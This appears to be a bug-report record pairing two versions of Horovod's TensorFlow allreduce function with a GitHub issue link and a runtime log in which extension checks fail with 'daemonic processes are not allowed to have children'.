average: DEPRECATED, please use op instead.
device_dense: Device to be used for dense tensors. Uses GPU by default
if Horovod was built with HOROVOD_GPU_ALLREDUCE.
device_sparse: Device to be used for sparse tensors. Uses GPU by default
if Horovod was built with HOROVOD_GPU_ALLGATHER.
compression: Compression algorithm used to reduce the amount of data
sent and received by each worker node. Defaults to not
using compression.
op: The reduction operation to combine tensors across different ranks.
Defaults to Average if None is given.
Returns:
A tensor of the same shape and type as `tensor`, summed across all
processes.
"""
op = handle_average_backwards_compatibility(op, average)
# Averaging happens in framework code, so translate that to Sum for the actual call
true_op = Sum if op == Average else op
if isinstance(tensor, tf.IndexedSlices):
# TODO: Need to fix this to actuall call Adasum
if op == Adasum:
raise NotImplementedError(
"The Adasum reduction does not currently support sparse tensors. As a "
"workaround please pass sparse_as_dense=True to DistributedOptimizer"
)
with tf.device(device_sparse):
# For IndexedSlices, do two allgathers instead of an allreduce.
horovod_size = tf.cast(size(), tensor.values.dtype)
values = allgather(tensor.values)
indices = allgather(tensor.indices)
# To make this operation into an average, divide allgathered values by
# the Horovod size.
new_values = (values / horovod_size) if op == Average else values
return tf.IndexedSlices(new_values, indices, dense_shape=tensor.dense_shape)
else:
with tf.device(device_dense):
horovod_size = tf.cast(size(), dtype=tensor.dtype)
tensor_compressed, ctx = compression.compress(tensor)
summed_tensor_compressed = _allreduce(tensor_compressed, op=true_op)
summed_tensor = compression.decompress(summed_tensor_compressed, ctx)
if op == Adasum:
if "CPU" not in tensor.device and gpu_available("tensorflow"):
if nccl_built():
if not is_homogeneous:
raise NotImplementedError(
"Running GPU Adasum on heterogeneous cluster is not supported yet."
)
elif not check_num_rank_power_of_2(int(size() / local_size())):
raise NotImplementedError(
"Running GPU Adasum with non-power of 2 nodes is not supported yet."
)
horovod_local_size = tf.cast(local_size(), dtype=tensor.dtype)
new_tensor = summed_tensor / horovod_local_size
else:
warnings.warn(
"Adasum reduction does not currently support GPU reduction using MPI. Tensors "
"are copied to CPU memory instead. To use Adasum for GPU reduction, please "
"compile Horovod with HOROVOD_GPU_ALLREDUCE=NCCL."
)
new_tensor = summed_tensor
else:
if not check_num_rank_power_of_2(size()):
raise NotImplementedError(
"Running Adasum with non-power of 2 ranks is not supported yet."
)
new_tensor = summed_tensor
else:
new_tensor = (
(summed_tensor / horovod_size) if op == Average else summed_tensor
)
return new_tensor
|
def allreduce(
tensor,
average=None,
device_dense="",
device_sparse="",
compression=Compression.none,
op=None,
):
"""Perform an allreduce on a tf.Tensor or tf.IndexedSlices.
This function performs a bandwidth-optimal ring allreduce on the input
tensor. If the input is an tf.IndexedSlices, the function instead does an
allgather on the values and the indices, effectively doing an allreduce on
the represented tensor.
Arguments:
tensor: tf.Tensor, tf.Variable, or tf.IndexedSlices to reduce.
The shape of the input must be identical across all ranks.
average: DEPRECATED, please use op instead.
device_dense: Device to be used for dense tensors. Uses GPU by default
if Horovod was built with HOROVOD_GPU_ALLREDUCE.
device_sparse: Device to be used for sparse tensors. Uses GPU by default
if Horovod was built with HOROVOD_GPU_ALLGATHER.
compression: Compression algorithm used to reduce the amount of data
sent and received by each worker node. Defaults to not
using compression.
op: The reduction operation to combine tensors across different ranks.
Defaults to Average if None is given.
Returns:
A tensor of the same shape and type as `tensor`, summed across all
processes.
"""
op = handle_average_backwards_compatibility(op, average)
# Averaging happens in framework code, so translate that to Sum for the actual call
true_op = Sum if op == Average else op
if isinstance(tensor, tf.IndexedSlices):
# TODO: Need to fix this to actuall call Adasum
if op == Adasum:
raise NotImplementedError(
"The Adasum reduction does not currently support "
"sparse tensors. As a workaround please pass sparse_as_dense=True to "
"DistributedOptimizer"
)
with tf.device(device_sparse):
# For IndexedSlices, do two allgathers instead of an allreduce.
horovod_size = tf.cast(size(), tensor.values.dtype)
values = allgather(tensor.values)
indices = allgather(tensor.indices)
# To make this operation into an average, divide allgathered values by
# the Horovod size.
new_values = (values / horovod_size) if op == Average else values
return tf.IndexedSlices(new_values, indices, dense_shape=tensor.dense_shape)
else:
with tf.device(device_dense):
horovod_size = tf.cast(size(), dtype=tensor.dtype)
tensor_compressed, ctx = compression.compress(tensor)
summed_tensor_compressed = _allreduce(tensor_compressed, op=true_op)
summed_tensor = compression.decompress(summed_tensor_compressed, ctx)
if op == Adasum:
if "CPU" not in tensor.device and has_gpu:
if nccl_built():
if not is_homogeneous:
raise NotImplementedError(
"Running GPU Adasum on heterogeneous cluster is not supported yet."
)
elif not check_num_rank_power_of_2(int(size() / local_size())):
raise NotImplementedError(
"Running GPU Adasum with non-power of 2 nodes is not supported yet."
)
horovod_local_size = tf.cast(local_size(), dtype=tensor.dtype)
new_tensor = summed_tensor / horovod_local_size
else:
warnings.warn(
"Adasum reduction does not currently support "
"GPU reduction using MPI. Tensors are copied to CPU memory instead."
"To use Adasum for GPU reduction, please compile Horovod with HOROVOD_GPU_ALLREDUCE=NCCL."
)
new_tensor = summed_tensor
else:
if not check_num_rank_power_of_2(size()):
raise NotImplementedError(
"Running Adasum with non-power of 2 ranks is not supported yet."
)
new_tensor = summed_tensor
else:
new_tensor = (
(summed_tensor / horovod_size) if op == Average else summed_tensor
)
return new_tensor
|
https://github.com/horovod/horovod/issues/1568
|
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || Checking whether extension tensorflow was built with MPI.
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || /opt/conda/lib/python3.6/site-packages/tensorflow/python/framework/dtypes.py:516: FutureWarning: Passing (type, 1) or '1type' as a synonym of type is deprecated; in a future version of numpy, it will be understood as (type, (1,)) / '(1,)type'.
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || _np_qint8 = np.dtype([("qint8", np.int8, 1)])
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || /opt/conda/lib/python3.6/site-packages/tensorflow/python/framework/dtypes.py:517: FutureWarning: Passing (type, 1) or '1type' as a synonym of type is deprecated; in a future version of numpy, it will be understood as (type, (1,)) / '(1,)type'.
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || _np_quint8 = np.dtype([("quint8", np.uint8, 1)])
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || /opt/conda/lib/python3.6/site-packages/tensorflow/python/framework/dtypes.py:518: FutureWarning: Passing (type, 1) or '1type' as a synonym of type is deprecated; in a future version of numpy, it will be understood as (type, (1,)) / '(1,)type'.
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || _np_qint16 = np.dtype([("qint16", np.int16, 1)])
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || /opt/conda/lib/python3.6/site-packages/tensorflow/python/framework/dtypes.py:519: FutureWarning: Passing (type, 1) or '1type' as a synonym of type is deprecated; in a future version of numpy, it will be understood as (type, (1,)) / '(1,)type'.
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || _np_quint16 = np.dtype([("quint16", np.uint16, 1)])
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || /opt/conda/lib/python3.6/site-packages/tensorflow/python/framework/dtypes.py:520: FutureWarning: Passing (type, 1) or '1type' as a synonym of type is deprecated; in a future version of numpy, it will be understood as (type, (1,)) / '(1,)type'.
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || _np_qint32 = np.dtype([("qint32", np.int32, 1)])
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || /opt/conda/lib/python3.6/site-packages/tensorflow/python/framework/dtypes.py:525: FutureWarning: Passing (type, 1) or '1type' as a synonym of type is deprecated; in a future version of numpy, it will be understood as (type, (1,)) / '(1,)type'.
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || np_resource = np.dtype([("resource", np.ubyte, 1)])
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || /opt/conda/lib/python3.6/site-packages/tensorboard/compat/tensorflow_stub/dtypes.py:541: FutureWarning: Passing (type, 1) or '1type' as a synonym of type is deprecated; in a future version of numpy, it will be understood as (type, (1,)) / '(1,)type'.
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || _np_qint8 = np.dtype([("qint8", np.int8, 1)])
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || /opt/conda/lib/python3.6/site-packages/tensorboard/compat/tensorflow_stub/dtypes.py:542: FutureWarning: Passing (type, 1) or '1type' as a synonym of type is deprecated; in a future version of numpy, it will be understood as (type, (1,)) / '(1,)type'.
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || _np_quint8 = np.dtype([("quint8", np.uint8, 1)])
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || /opt/conda/lib/python3.6/site-packages/tensorboard/compat/tensorflow_stub/dtypes.py:543: FutureWarning: Passing (type, 1) or '1type' as a synonym of type is deprecated; in a future version of numpy, it will be understood as (type, (1,)) / '(1,)type'.
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || _np_qint16 = np.dtype([("qint16", np.int16, 1)])
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || /opt/conda/lib/python3.6/site-packages/tensorboard/compat/tensorflow_stub/dtypes.py:544: FutureWarning: Passing (type, 1) or '1type' as a synonym of type is deprecated; in a future version of numpy, it will be understood as (type, (1,)) / '(1,)type'.
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || _np_quint16 = np.dtype([("quint16", np.uint16, 1)])
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || /opt/conda/lib/python3.6/site-packages/tensorboard/compat/tensorflow_stub/dtypes.py:545: FutureWarning: Passing (type, 1) or '1type' as a synonym of type is deprecated; in a future version of numpy, it will be understood as (type, (1,)) / '(1,)type'.
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || _np_qint32 = np.dtype([("qint32", np.int32, 1)])
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || /opt/conda/lib/python3.6/site-packages/tensorboard/compat/tensorflow_stub/dtypes.py:550: FutureWarning: Passing (type, 1) or '1type' as a synonym of type is deprecated; in a future version of numpy, it will be understood as (type, (1,)) / '(1,)type'.
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || np_resource = np.dtype([("resource", np.ubyte, 1)])
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || Traceback (most recent call last):
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "/opt/conda/lib/python3.6/site-packages/horovod/common/util.py", line 73, in _target_fn
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || ext = importlib.import_module('.' + ext_base_name, 'horovod')
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "/opt/conda/lib/python3.6/importlib/__init__.py", line 126, in import_module
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || return _bootstrap._gcd_import(name[level:], package, level)
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "<frozen importlib._bootstrap>", line 994, in _gcd_import
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "<frozen importlib._bootstrap>", line 971, in _find_and_load
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "<frozen importlib._bootstrap>", line 955, in _find_and_load_unlocked
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "<frozen importlib._bootstrap>", line 665, in _load_unlocked
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "<frozen importlib._bootstrap_external>", line 678, in exec_module
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "<frozen importlib._bootstrap>", line 219, in _call_with_frames_removed
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "/opt/conda/lib/python3.6/site-packages/horovod/tensorflow/__init__.py", line 43, in <module>
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || has_gpu = gpu_available('tensorflow')
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "/opt/conda/lib/python3.6/site-packages/horovod/common/util.py", line 104, in gpu_available
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || ext_base_name, available_fn, 'running with GPU', verbose) or False
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "/opt/conda/lib/python3.6/site-packages/horovod/common/util.py", line 90, in _check_extension_lambda
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || p.start()
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "/opt/conda/lib/python3.6/multiprocessing/process.py", line 103, in start
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || 'daemonic processes are not allowed to have children'
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || AssertionError: daemonic processes are not allowed to have children
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || Extension tensorflow was NOT built with MPI.
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || Checking whether extension torch was built with MPI.
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || Traceback (most recent call last):
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "/opt/conda/lib/python3.6/site-packages/horovod/common/util.py", line 73, in _target_fn
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || ext = importlib.import_module('.' + ext_base_name, 'horovod')
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "/opt/conda/lib/python3.6/importlib/__init__.py", line 126, in import_module
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || return _bootstrap._gcd_import(name[level:], package, level)
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "<frozen importlib._bootstrap>", line 994, in _gcd_import
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "<frozen importlib._bootstrap>", line 971, in _find_and_load
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "<frozen importlib._bootstrap>", line 955, in _find_and_load_unlocked
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "<frozen importlib._bootstrap>", line 665, in _load_unlocked
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "<frozen importlib._bootstrap_external>", line 678, in exec_module
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "<frozen importlib._bootstrap>", line 219, in _call_with_frames_removed
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "/opt/conda/lib/python3.6/site-packages/horovod/torch/__init__.py", line 39, in <module>
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || from horovod.torch.mpi_ops import allreduce, allreduce_async, allreduce_, allreduce_async_
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "/opt/conda/lib/python3.6/site-packages/horovod/torch/mpi_ops.py", line 80, in <module>
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || _has_gpu = gpu_available('torch')
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "/opt/conda/lib/python3.6/site-packages/horovod/common/util.py", line 104, in gpu_available
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || ext_base_name, available_fn, 'running with GPU', verbose) or False
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "/opt/conda/lib/python3.6/site-packages/horovod/common/util.py", line 90, in _check_extension_lambda
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || p.start()
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "/opt/conda/lib/python3.6/multiprocessing/process.py", line 103, in start
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || 'daemonic processes are not allowed to have children'
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || AssertionError: daemonic processes are not allowed to have children
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || Extension torch was NOT built with MPI.
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || Checking whether extension mxnet was built with MPI.
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || Traceback (most recent call last):
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "/opt/conda/lib/python3.6/site-packages/horovod/common/util.py", line 73, in _target_fn
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || ext = importlib.import_module('.' + ext_base_name, 'horovod')
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "/opt/conda/lib/python3.6/importlib/__init__.py", line 126, in import_module
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || return _bootstrap._gcd_import(name[level:], package, level)
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "<frozen importlib._bootstrap>", line 994, in _gcd_import
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "<frozen importlib._bootstrap>", line 971, in _find_and_load
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "<frozen importlib._bootstrap>", line 955, in _find_and_load_unlocked
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "<frozen importlib._bootstrap>", line 665, in _load_unlocked
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "<frozen importlib._bootstrap_external>", line 678, in exec_module
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "<frozen importlib._bootstrap>", line 219, in _call_with_frames_removed
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "/opt/conda/lib/python3.6/site-packages/horovod/mxnet/__init__.py", line 23, in <module>
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || __file__, 'mpi_lib')
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "/opt/conda/lib/python3.6/site-packages/horovod/common/util.py", line 51, in check_extension
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || 'Horovod with %s=1 to debug the build error.' % (ext_name, ext_env_var))
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || Extension mxnet was NOT built with MPI.
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || ImportError: Extension horovod.mxnet has not been built. If this is not expected, reinstall Horovod with HOROVOD_WITH_MXNET=1 to debug the build error.
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || Checking whether extension tensorflow was built with Gloo.
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || /opt/conda/lib/python3.6/site-packages/tensorflow/python/framework/dtypes.py:516: FutureWarning: Passing (type, 1) or '1type' as a synonym of type is deprecated; in a future version of numpy, it will be understood as (type, (1,)) / '(1,)type'.
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || _np_qint8 = np.dtype([("qint8", np.int8, 1)])
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || /opt/conda/lib/python3.6/site-packages/tensorflow/python/framework/dtypes.py:517: FutureWarning: Passing (type, 1) or '1type' as a synonym of type is deprecated; in a future version of numpy, it will be understood as (type, (1,)) / '(1,)type'.
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || _np_quint8 = np.dtype([("quint8", np.uint8, 1)])
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || /opt/conda/lib/python3.6/site-packages/tensorflow/python/framework/dtypes.py:518: FutureWarning: Passing (type, 1) or '1type' as a synonym of type is deprecated; in a future version of numpy, it will be understood as (type, (1,)) / '(1,)type'.
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || _np_qint16 = np.dtype([("qint16", np.int16, 1)])
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || /opt/conda/lib/python3.6/site-packages/tensorflow/python/framework/dtypes.py:519: FutureWarning: Passing (type, 1) or '1type' as a synonym of type is deprecated; in a future version of numpy, it will be understood as (type, (1,)) / '(1,)type'.
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || _np_quint16 = np.dtype([("quint16", np.uint16, 1)])
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || /opt/conda/lib/python3.6/site-packages/tensorflow/python/framework/dtypes.py:520: FutureWarning: Passing (type, 1) or '1type' as a synonym of type is deprecated; in a future version of numpy, it will be understood as (type, (1,)) / '(1,)type'.
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || _np_qint32 = np.dtype([("qint32", np.int32, 1)])
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || /opt/conda/lib/python3.6/site-packages/tensorflow/python/framework/dtypes.py:525: FutureWarning: Passing (type, 1) or '1type' as a synonym of type is deprecated; in a future version of numpy, it will be understood as (type, (1,)) / '(1,)type'.
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || np_resource = np.dtype([("resource", np.ubyte, 1)])
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || /opt/conda/lib/python3.6/site-packages/tensorboard/compat/tensorflow_stub/dtypes.py:541: FutureWarning: Passing (type, 1) or '1type' as a synonym of type is deprecated; in a future version of numpy, it will be understood as (type, (1,)) / '(1,)type'.
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || _np_qint8 = np.dtype([("qint8", np.int8, 1)])
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || /opt/conda/lib/python3.6/site-packages/tensorboard/compat/tensorflow_stub/dtypes.py:542: FutureWarning: Passing (type, 1) or '1type' as a synonym of type is deprecated; in a future version of numpy, it will be understood as (type, (1,)) / '(1,)type'.
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || _np_quint8 = np.dtype([("quint8", np.uint8, 1)])
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || /opt/conda/lib/python3.6/site-packages/tensorboard/compat/tensorflow_stub/dtypes.py:543: FutureWarning: Passing (type, 1) or '1type' as a synonym of type is deprecated; in a future version of numpy, it will be understood as (type, (1,)) / '(1,)type'.
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || _np_qint16 = np.dtype([("qint16", np.int16, 1)])
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || /opt/conda/lib/python3.6/site-packages/tensorboard/compat/tensorflow_stub/dtypes.py:544: FutureWarning: Passing (type, 1) or '1type' as a synonym of type is deprecated; in a future version of numpy, it will be understood as (type, (1,)) / '(1,)type'.
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || _np_quint16 = np.dtype([("quint16", np.uint16, 1)])
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || /opt/conda/lib/python3.6/site-packages/tensorboard/compat/tensorflow_stub/dtypes.py:545: FutureWarning: Passing (type, 1) or '1type' as a synonym of type is deprecated; in a future version of numpy, it will be understood as (type, (1,)) / '(1,)type'.
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || _np_qint32 = np.dtype([("qint32", np.int32, 1)])
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || /opt/conda/lib/python3.6/site-packages/tensorboard/compat/tensorflow_stub/dtypes.py:550: FutureWarning: Passing (type, 1) or '1type' as a synonym of type is deprecated; in a future version of numpy, it will be understood as (type, (1,)) / '(1,)type'.
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || np_resource = np.dtype([("resource", np.ubyte, 1)])
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || Traceback (most recent call last):
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "/opt/conda/lib/python3.6/site-packages/horovod/common/util.py", line 73, in _target_fn
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || ext = importlib.import_module('.' + ext_base_name, 'horovod')
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "/opt/conda/lib/python3.6/importlib/__init__.py", line 126, in import_module
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || return _bootstrap._gcd_import(name[level:], package, level)
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "<frozen importlib._bootstrap>", line 994, in _gcd_import
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "<frozen importlib._bootstrap>", line 971, in _find_and_load
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "<frozen importlib._bootstrap>", line 955, in _find_and_load_unlocked
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "<frozen importlib._bootstrap>", line 665, in _load_unlocked
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "<frozen importlib._bootstrap_external>", line 678, in exec_module
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "<frozen importlib._bootstrap>", line 219, in _call_with_frames_removed
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "/opt/conda/lib/python3.6/site-packages/horovod/tensorflow/__init__.py", line 43, in <module>
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || has_gpu = gpu_available('tensorflow')
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "/opt/conda/lib/python3.6/site-packages/horovod/common/util.py", line 104, in gpu_available
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || ext_base_name, available_fn, 'running with GPU', verbose) or False
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "/opt/conda/lib/python3.6/site-packages/horovod/common/util.py", line 90, in _check_extension_lambda
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || p.start()
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "/opt/conda/lib/python3.6/multiprocessing/process.py", line 103, in start
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || 'daemonic processes are not allowed to have children'
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || AssertionError: daemonic processes are not allowed to have children
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || Extension tensorflow was NOT built with Gloo.
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || Checking whether extension torch was built with Gloo.
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || Traceback (most recent call last):
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "/opt/conda/lib/python3.6/site-packages/horovod/common/util.py", line 73, in _target_fn
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || ext = importlib.import_module('.' + ext_base_name, 'horovod')
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "/opt/conda/lib/python3.6/importlib/__init__.py", line 126, in import_module
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || return _bootstrap._gcd_import(name[level:], package, level)
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "<frozen importlib._bootstrap>", line 994, in _gcd_import
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "<frozen importlib._bootstrap>", line 971, in _find_and_load
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "<frozen importlib._bootstrap>", line 955, in _find_and_load_unlocked
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "<frozen importlib._bootstrap>", line 665, in _load_unlocked
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "<frozen importlib._bootstrap_external>", line 678, in exec_module
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "<frozen importlib._bootstrap>", line 219, in _call_with_frames_removed
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "/opt/conda/lib/python3.6/site-packages/horovod/torch/__init__.py", line 39, in <module>
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || from horovod.torch.mpi_ops import allreduce, allreduce_async, allreduce_, allreduce_async_
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "/opt/conda/lib/python3.6/site-packages/horovod/torch/mpi_ops.py", line 80, in <module>
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || _has_gpu = gpu_available('torch')
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "/opt/conda/lib/python3.6/site-packages/horovod/common/util.py", line 104, in gpu_available
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || ext_base_name, available_fn, 'running with GPU', verbose) or False
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "/opt/conda/lib/python3.6/site-packages/horovod/common/util.py", line 90, in _check_extension_lambda
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || p.start()
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "/opt/conda/lib/python3.6/multiprocessing/process.py", line 103, in start
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || 'daemonic processes are not allowed to have children'
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || AssertionError: daemonic processes are not allowed to have children
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || Extension torch was NOT built with Gloo.
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || Checking whether extension mxnet was built with Gloo.
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || Traceback (most recent call last):
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "/opt/conda/lib/python3.6/site-packages/horovod/common/util.py", line 73, in _target_fn
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || ext = importlib.import_module('.' + ext_base_name, 'horovod')
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "/opt/conda/lib/python3.6/importlib/__init__.py", line 126, in import_module
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || return _bootstrap._gcd_import(name[level:], package, level)
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "<frozen importlib._bootstrap>", line 994, in _gcd_import
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "<frozen importlib._bootstrap>", line 971, in _find_and_load
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "<frozen importlib._bootstrap>", line 955, in _find_and_load_unlocked
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "<frozen importlib._bootstrap>", line 665, in _load_unlocked
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "<frozen importlib._bootstrap_external>", line 678, in exec_module
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "<frozen importlib._bootstrap>", line 219, in _call_with_frames_removed
